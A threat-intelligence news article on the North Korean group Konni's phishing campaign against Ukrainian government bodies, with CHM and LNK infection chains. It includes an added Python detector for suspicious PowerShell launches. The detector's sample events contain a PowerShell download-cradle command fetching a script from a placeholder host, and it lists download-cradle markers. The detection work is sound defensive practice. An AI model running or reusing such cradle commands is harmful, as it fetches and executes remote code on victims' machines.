The North Korean state-sponsored threat group known as Konni—also referred to by aliases such as Opal Sleet and TA406—has ramped up cyber espionage efforts against Ukrainian government bodies.
These initiatives gather intelligence that could shape North Korea’s military strategy regarding the Russia-Ukraine conflict.
In February 2025, a team of threat intelligence analysts uncovered this campaign, discovering that the attackers used phishing emails masquerading as messages from fictitious think tanks.
These emails cited recent political or military events in Ukraine, such as leadership changes or electoral occurrences, to bolster their credibility and entice recipients to open harmful content.
Analysts believe this campaign is crafted to assist North Korean leaders in assessing the strength of Ukrainian resistance, the potential trajectory of the conflict, and the risks posed to North Korean personnel deployed in support of Russian forces since late 2024.
The intelligence collected may also help predict whether Russia might seek further assistance in terms of troops or weaponry.
The Konni group uses phishing tactics as its primary weapon in its attack process.
According to investigations, the Konni threat group sent phishing emails through free services like Gmail, ProtonMail, and Outlook.
Subsequently, victims were led to MEGA-hosted downloads containing a password-protected archive labelled Analytical Report[.]rar. Inside this archive was a compiled HTML help file (.CHM) that, when opened, executed embedded PowerShell commands.
These commands initiated downloads of additional malicious scripts that conducted host reconnaissance and ensured persistence on infected systems.
Variants of the attack chain were noted using HTML attachments to release ZIP archives containing decoy PDF documents and harmful LNK shortcuts. These shortcuts eventually executed PowerShell and VBScript code.
While the final payload of these attacks remains unrecovered, it is suspected to be a backdoor or malware component intended for long-term espionage activities.
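The two delivery chains described above (CHM file spawning PowerShell, and LNK shortcut launching a PowerShell download cradle) both leave a recognisable parent/child process signature. The following added example, which is not code from the original report or its authors, runs a simple detection over constructed Sysmon-style process-creation events; the field names, sample paths and the placeholder URL are assumptions, and the command-line markers are an illustrative starting list rather than a complete one.

```python
import json

# Constructed Sysmon-style process-creation events (sample data only, not indicators from the report).
SAMPLE_EVENTS = r"""
{"parent_image": "C:\\Windows\\hh.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "command_line": "powershell.exe -w hidden -enc UGxhY2Vob2xkZXI="}
{"parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "command_line": "powershell.exe -nop -c IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/stage2.ps1')"}
{"parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "command_line": "powershell.exe"}
{"parent_image": "C:\\Windows\\System32\\services.exe", "image": "C:\\Windows\\System32\\svchost.exe", "command_line": "svchost.exe -k netsvcs"}
"""

# Script interpreters a CHM-embedded or LNK-embedded command would typically launch.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Illustrative download-cradle / encoded-command markers; tune for your environment (e.g. "-enc" also matches "-Encoding").
CRADLE_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest", "invoke-expression", "iex ", "iex(", "-enc", "frombase64string")


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list[str]:
    """Return the detection reasons that apply to one process-creation event."""
    parent = basename(event.get("parent_image", ""))
    child = basename(event.get("image", ""))
    cmd = event.get("command_line", "").lower()
    reasons = []
    # CHM chain: the help viewer (hh.exe) should never need to spawn a script interpreter.
    if parent == "hh.exe" and child in SCRIPT_HOSTS:
        reasons.append("chm_spawned_script_host")
    # LNK chain: a shortcut clicked in Explorer launches the interpreter with a cradle on its command line.
    if parent == "explorer.exe" and child in SCRIPT_HOSTS and any(m in cmd for m in CRADLE_MARKERS):
        reasons.append("user_launched_script_host_with_download_cradle")
    return reasons


def scan(jsonl: str) -> list[tuple[int, list[str]]]:
    """Scan JSON-lines events and return (event index, reasons) for every hit."""
    hits = []
    for n, line in enumerate(l for l in jsonl.splitlines() if l.strip()):
        reasons = classify(json.loads(line))
        if reasons:
            hits.append((n, reasons))
    return hits


if __name__ == "__main__":
    for n, reasons in scan(SAMPLE_EVENTS):
        print(f"event {n}: {', '.join(reasons)}")
```

Only the first two sample events are flagged; the plain interactive PowerShell launch and the service host start are left alone.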
Analysts also identified prior reconnaissance activities linked to the same threat actor. These efforts included phishing emails that imitated Microsoft security alerts, falsely alerting targets about suspicious login attempts and directing them to a counterfeit authentication page hosted on jetmf[.]com to capture login credentials.
This campaign signifies a notable escalation in North Korea’s cyber initiatives beyond its economic and strategic espionage goals.
It also highlights the growing complexity of Ukraine’s cybersecurity issues, which have been primarily shaped by ongoing Russian cyber threats since the beginning of the war.
